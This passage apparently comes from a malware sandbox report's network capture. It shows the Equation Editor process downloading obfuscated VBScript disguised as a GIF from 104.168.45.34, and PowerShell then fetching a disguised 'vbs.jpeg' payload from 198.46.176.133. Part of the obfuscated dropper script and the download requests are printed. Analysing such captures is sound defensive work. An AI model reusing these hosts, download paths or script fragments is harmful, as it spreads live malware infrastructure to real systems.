6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
Jul 26, 2024 13:02:37.608457088 CEST	152	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: hq.ax
Jul 26, 2024 13:02:37.720797062 CEST	800	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 26 Jul 2024 11:02:37 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 26 Jul 2024 12:02:37 GMT Location: https://hq.ax/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=52bwsBa%2B3QPfk2vvBgJET50rhSYZWgjCi%2BoLTBCY6TTJLL28XhFVPVuW9tcrqCDGLkV%2Buf5idwlCpn8rJtdh5yd85RZ6Nx5b7QOzHL0KgPPMYQ0nify%2BIQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e6055ee58c2d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
Jul 26, 2024 13:02:38.175988913 CEST	800	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 26 Jul 2024 11:02:37 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 26 Jul 2024 12:02:37 GMT Location: https://hq.ax/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=52bwsBa%2B3QPfk2vvBgJET50rhSYZWgjCi%2BoLTBCY6TTJLL28XhFVPVuW9tcrqCDGLkV%2Buf5idwlCpn8rJtdh5yd85RZ6Nx5b7QOzHL0KgPPMYQ0nify%2BIQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e6055ee58c2d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
Jul 26, 2024 13:02:45.709342957 CEST	152	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: hq.ax
Jul 26, 2024 13:02:45.810204029 CEST	804	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 26 Jul 2024 11:02:45 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 26 Jul 2024 12:02:45 GMT Location: https://hq.ax/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fWmdK1nw6NJNxmKOvTPd%2FsWgsm9yD2N%2FdapmYRo7g%2FU63OERoRUOFUQjTGgK87JrNFM506W7HoYFfHVn%2BzYzm5915bx1pTLoO%2BWy7%2FOwqGTGuNgcENWwhw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e637f8c28c2d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
Jul 26, 2024 13:02:46.058593035 CEST	804	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 26 Jul 2024 11:02:45 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 26 Jul 2024 12:02:45 GMT Location: https://hq.ax/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fWmdK1nw6NJNxmKOvTPd%2FsWgsm9yD2N%2FdapmYRo7g%2FU63OERoRUOFUQjTGgK87JrNFM506W7HoYFfHVn%2BzYzm5915bx1pTLoO%2BWy7%2FOwqGTGuNgcENWwhw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e637f8c28c2d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
Jul 26, 2024 13:02:47.661653996 CEST	152	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: hq.ax
Jul 26, 2024 13:02:47.765194893 CEST	796	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 26 Jul 2024 11:02:47 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Fri, 26 Jul 2024 12:02:47 GMT Location: https://hq.ax/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xtMUGuM2pJjpKRhS4KQRNCk0DaBLl1kCQFdF55kwGrGcsIQ93rWRw4VvOd%2Bt4BYpaxUoMiafFzJG26BFWYRi3d1%2FapFmd2OUHulnjibzqxA0irfGy5WvDA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93e6443a6f8c2d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.22	49176	104.168.45.34	80	3468	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:02:41.466311932 CEST	345	OUT	GET /59/createdthingstobefrankwithmeeverywhere.gIF HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 104.168.45.34 Connection: Keep-Alive
Jul 26, 2024 13:02:41.945300102 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 11:02:41 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Fri, 26 Jul 2024 06:30:51 GMT ETag: "65850-61e20a7199236" Accept-Ranges: bytes Content-Length: 415824 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/gif Data Raw: ff fe 64 00 69 00 6d 00 20 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 20 00 0d 00 0a 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 20 00 3d 00 20 00 6f 00 70 00 73 00 6f 00 70 00 68 00 61 00 67 00 69 00 61 00 0d 00 0a 00 63 00 61 00 62 00 69 00 72 00 74 00 6f 00 28 00 22 00 62 00 69 00 73 00 74 00 6f 00 72 00 74 00 61 00 22 00 29 00 20 00 26 00 20 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 63 00 61 00 62 00 69 00 72 00 74 00 6f 00 28 00 22 00 6c 00 61 00 63 00 68 00 61 00 22 00 29 00 20 00 26 00 20 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 63 00 61 00 62 00 69 00 72 00 74 00 6f 00 28 00 22 00 63 00 61 00 6e 00 74 00 6f 00 22 00 29 00 20 00 26 00 20 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 63 00 61 00 62 00 69 00 72 00 74 00 6f 00 28 00 22 00 76 00 75 00 6c 00 67 00 6f 00 63 00 72 00 61 00 63 00 69 00 61 00 22 00 29 00 20 00 26 00 20 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 20 00 [TRUNCATED] Data Ascii: dim gamelan gamelan = opsophagiacabirto("bistorta") & gamelan & _cabirto("lacha") & gamelan & _cabirto("canto") & gamelan & _cabirto("vulgocracia") & gamelan & _cabirto("X_HelpUris_005_0_Message") & gamelan & _cabirto("coisica") & gamelan & _cabirto("portello") & gamelan & _cabirto("X_HelpUris_008_0_Message") & gamelan & _cabirto("X_HelpUris_009_0_Message") & gamelan & _cabirto("X_HelpUris_010_0_Message") & gamelan & _cabirto("L_Hel
Jul 26, 2024 13:02:41.946031094 CEST	1236	IN	Data Raw: 70 00 55 00 72 00 69 00 73 00 5f 00 30 00 31 00 31 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 63 00 61 00 62 00 69 00 Data Ascii: pUris_011_0_Message") & gamelan & _cabirto("L_HelpUris_012_0_Message") & gamelan & _cabirto("X_HelpUris_013_0_Message"
Jul 26, 2024 13:02:41.946070910 CEST	1236	IN	Data Raw: 30 00 31 00 35 00 5f 00 37 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 63 00 61 00 62 00 69 00 72 00 74 00 6f 00 28 00 22 00 58 00 Data Ascii: 015_7_Message") & gamelan & _cabirto("X_HelpUris_015_8_Message") & gamelan & _cabirto("L_HelpUris_015_9_Message") & ga
Jul 26, 2024 13:02:41.949464083 CEST	1236	IN	Data Raw: 6c 00 61 00 6e 00 45 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 63 00 61 00 62 00 69 00 72 00 74 00 6f 00 28 00 22 00 4c 00 5f 00 48 00 65 00 6c 00 70 00 41 00 6c 00 69 00 61 00 73 00 5f 00 30 00 30 00 32 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 Data Ascii: lanE & _cabirto("L_HelpAlias_002_0_Message") & gamelanE & _cabirto("L_HelpAlias_003_0_Message") & gamelanE & _cabirt
Jul 26, 2024 13:02:41.949497938 CEST	1236	IN	Data Raw: 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 45 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 63 00 61 00 62 00 69 00 72 00 74 00 6f 00 28 00 22 00 4c 00 5f 00 48 00 65 00 Data Ascii: 0_Message") & gamelanE & _cabirto("L_HelpAlias_014_0_Message") & gamelanE & _cabirto("X_HelpAlias_015_0_Message") & ga
Jul 26, 2024 13:02:41.953345060 CEST	1236	IN	Data Raw: 30 00 30 00 37 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 65 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 45 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 63 00 61 00 62 00 69 00 72 00 74 00 6f 00 28 00 Data Ascii: 007_0_Message") & egamelanE & _cabirto("X_HelpAlias_008_0_Message") & egamelanE & _cabirto("X_HelpAlias_009_0_Message"
Jul 26, 2024 13:02:41.953377962 CEST	1236	IN	Data Raw: 5f 00 48 00 65 00 6c 00 70 00 41 00 6c 00 69 00 61 00 73 00 5f 00 30 00 30 00 31 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 6f 00 65 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 45 00 20 00 26 00 Data Ascii: _HelpAlias_001_0_Message") & oegamelanE & _cabirto("L_HelpAlias_002_0_Message") & oegamelanE & _cabirto("L_HelpAlias_0
Jul 26, 2024 13:02:41.953408003 CEST	108	IN	Data Raw: 32 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 6f 00 65 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 45 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 63 00 61 00 62 00 69 00 72 00 74 00 6f 00 28 00 22 00 Data Ascii: 2_0_Message") & oegamelanE & _cabirto("L_HelpAlias_0
Jul 26, 2024 13:02:41.957155943 CEST	1236	IN	Data Raw: 31 00 33 00 5f 00 30 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 22 00 29 00 20 00 26 00 20 00 6f 00 65 00 67 00 61 00 6d 00 65 00 6c 00 61 00 6e 00 45 00 20 00 26 00 20 00 5f 00 0d 00 0a 00 63 00 61 00 62 00 69 00 72 00 74 00 6f 00 28 00 Data Ascii: 13_0_Message") & oegamelanE & _cabirto("L_HelpAlias_014_0_Message") & oegamelanE & _cabirto("X_HelpAlias_015_0_Message
Jul 26, 2024 13:02:41.957190990 CEST	1236	IN	Data Raw: 50 00 54 00 5f 00 45 00 72 00 72 00 6f 00 72 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 22 00 53 00 77 00 69 00 74 00 63 00 68 00 20 00 6e 00 6f 00 74 00 20 00 61 00 6c 00 6c 00 6f 00 77 00 65 00 64 00 Data Ascii: PT_ErrorMessage = "Switch not allowed with the given operation: "private const L_UNKOPT_ErrorMessage = "Unknown
Jul 26, 2024 13:02:41.960098028 CEST	1236	IN	Data Raw: 6e 00 73 00 74 00 20 00 4c 00 5f 00 42 00 41 00 44 00 4d 00 41 00 54 00 43 00 4e 00 54 00 31 00 5f 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 20 00 20 00 20 00 20 00 20 00 20 00 3d 00 20 00 22 00 55 00 6e 00 65 00 78 00 70 00 65 00 63 00 74 00 Data Ascii: nst L_BADMATCNT1_Message = "Unexpected match count - one match is expected: "private const L_OPTNOTUNQ_Message

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.22	49177	198.46.176.133	80	3588	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:02:45.691478014 CEST	79	OUT	GET /Upload/vbs.jpeg HTTP/1.1 Host: 198.46.176.133 Connection: Keep-Alive
Jul 26, 2024 13:02:46.125204086 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 11:02:46 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Wed, 10 Jul 2024 11:19:54 GMT ETag: "1d7285-61ce2d35c4b0c" Accept-Ranges: bytes Content-Length: 1929861 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 d1 52 62 f0 15 72 82 92 e1 24 33 a2 b2 d2 f1 16 43 53 c2 08 34 63 17 25 35 36 73 93 e2 26 44 83 54 74 b3 c3 18 a3 d3 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#BRbr$3CS4c%56s&DTt?~5sRM9RWhco#4q7[B6v^Tgc"TY_xWeXBX50xFs,/Qcq2lyoT^=ofRGZ>(O5ceu;XG8s!u_.?,~XW!?$[8j=>gA>jz[WX)jO:q3n3VmmPo.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B,xGU5Pay'rErv^uYt70ur$UxA-OF9>uI^O^gy4A
Jul 26, 2024 13:02:46.125327110 CEST	224	IN	Data Raw: 70 9b 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a 8e 39 fe 78 02 c9 15 df 24 ae de 08 e7 2c 17 69 24 8e 7b 60 55 94 81 c7 4c a8 bb e3 ae 15 ce e5 07 b6 50 29 ea 0d 60 10 48 c8 01 dc 6f b8 39 7f 3d ea fd 23 e0 3b e0 36 37 b7 d7 2c 8b 66 89 a0 d8 06 67 04 Data Ascii: pC.J9x$,i${`ULP)`Ho9=#;67,fg+{NmXm2CS(+"]meHR87j(3N{d"a``QX;e0`Y8l`XLOn{eXadN(ma]pQ
Jul 26, 2024 13:02:46.125338078 CEST	1236	IN	Data Raw: ed 93 f7 72 19 58 8b 1d 70 91 49 4a 19 fa 9c ed 49 90 3a 84 7b de 2b e5 80 a4 69 24 84 28 5b 55 26 b1 97 89 c4 65 9c 52 a8 e0 63 10 ed 81 42 05 dc 3b 9f 7c 99 7c c4 47 60 39 ae 3e 18 09 92 b1 ed 61 5e 66 f6 f4 9e c0 67 e8 ef b0 7e 20 66 fd 90 f8 Data Ascii: rXpIJI:{+i$([U&eRcB;\|\|G`9>a^fg~ f/\|Dt?Rsbo;if3fe~<().\U~n;T?WLYW,V;t?7 X~al{2&y!S4pjV3JEP JIw$8
Jul 26, 2024 13:02:46.125680923 CEST	1236	IN	Data Raw: fe 1e 17 e0 30 21 17 5c 80 44 59 58 aa 8a 05 ba 0c ed 60 f1 08 e0 43 3c 8a d1 83 6a 01 53 59 0b 04 b2 4b 61 f7 1b a0 72 35 ba 3d 42 c9 02 49 23 32 48 2b e0 0d e0 7a 7f d9 b2 ea a7 fb 63 e1 d2 19 14 e9 d5 a5 2c bb 85 9f dd 30 e9 9f 5e d2 f8 5e 87 Data Ascii: 0!\DYX`C<jSYKar5=BI#2H+zc,0^^AHq7[GWu:xR_2P00u>!%gj_YtVR, \^3x-Yb>?hF`ms0~~".C7mW4fgp~4q3
Jul 26, 2024 13:02:46.125693083 CEST	1236	IN	Data Raw: 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87 8e 68 19 64 e5 58 1e 7d b3 c1 69 f4 cd ad fb 40 9a 7b 12 c1 09 34 5b a0 5e b9 ec 5e 3f bc Data Ascii: -W(=+EDhyS+z`a(hdX}i@{4[^^?#nx!x9,z"Ta~C!C3@8`mFfYk0?g3OWa4vA{`)D^*'8^U]H,^`&!Sgk&iNTS3B
Jul 26, 2024 13:02:46.126401901 CEST	1236	IN	Data Raw: 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 Data Ascii: 6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b^}E./bU4lSHC(#h'FIo\|$vd^b
Jul 26, 2024 13:02:46.126415014 CEST	896	IN	Data Raw: 91 18 33 6e 59 1b 76 d2 cb 62 bb e7 97 7d 3c ea 15 e4 8d 81 63 40 93 66 fd bf 5c 03 4b 34 93 b0 32 37 27 f4 c0 9f 45 f1 79 ac f2 68 1b c3 62 8c 07 59 57 b8 5b 60 7b df c3 1b 3a cd 34 1e 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c Data Ascii: 3nYvb}<c@f\K427'EyhbYW[`{:4<RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^
Jul 26, 2024 13:02:46.127311945 CEST	1236	IN	Data Raw: 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e Data Ascii: >o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCKK:>}01ia8-Q="O_!;jzEcn'J]h0T5xr]
Jul 26, 2024 13:02:46.127325058 CEST	1236	IN	Data Raw: 1f ed 4e 95 48 73 a7 95 fe 07 8c f1 31 69 0e c2 bf 78 70 7d eb 17 f1 2f 3f 44 13 ee f2 79 c5 a8 30 6b 15 81 ee 65 fb 67 a7 72 8a 9a 79 55 57 90 b6 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 Data Ascii: NHs1ixp}/?Dy0kegryUW8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7A
Jul 26, 2024 13:02:46.127713919 CEST	1236	IN	Data Raw: e8 fc 27 ee f0 34 4a 8f 3a ce ce 42 96 b5 1e 90 a6 b7 02 09 3d fb 9e 80 b6 e6 9f c6 5f 55 34 4f a9 90 85 fe 05 8d 15 42 9f 7a 50 01 3c 0e 4d f4 c0 fa ac be 3f a6 d4 c9 26 b1 34 ec ad 09 0a f0 12 e0 7a 55 89 bf 5d 30 f4 9e 41 1c 67 9c f1 bf b4 7a Data Ascii: '4J:B=_U4OBzP<M?&4zU]0Agz/.9/&IbCBCc\|g]7:9 'Ic#"evP=AxTN$kgJI"$`v,rO-]6iTIv14jpIF.UbX$Yi\|*QUB
Jul 26, 2024 13:02:46.130279064 CEST	1236	IN	Data Raw: d0 c4 b2 03 65 29 76 82 3b 8c 0c d3 09 40 49 0a c2 e8 73 95 68 dd 58 18 f6 af c9 b0 ce ca 5b 6a a8 60 0f 6e f9 c1 0b be dd a3 69 e0 81 80 b4 bb d5 b9 21 af 06 01 62 0d 0f cf 1d 4d 23 b8 65 28 d4 bc 0f 8e 0d f4 cf 13 1b 8d a8 0c 01 02 0c 4c a1 45 Data Ascii: e)v;@IshX[j`ni!bM#e(LE\yEandR*7%ugmPsR$HhDw}&_Dg:{[\|9cT5^y8QF:eP,qyj"hca]4hv!)Q#=qr%N'IG[u{AMB<!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.22	49181	104.168.45.34	80	3588	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
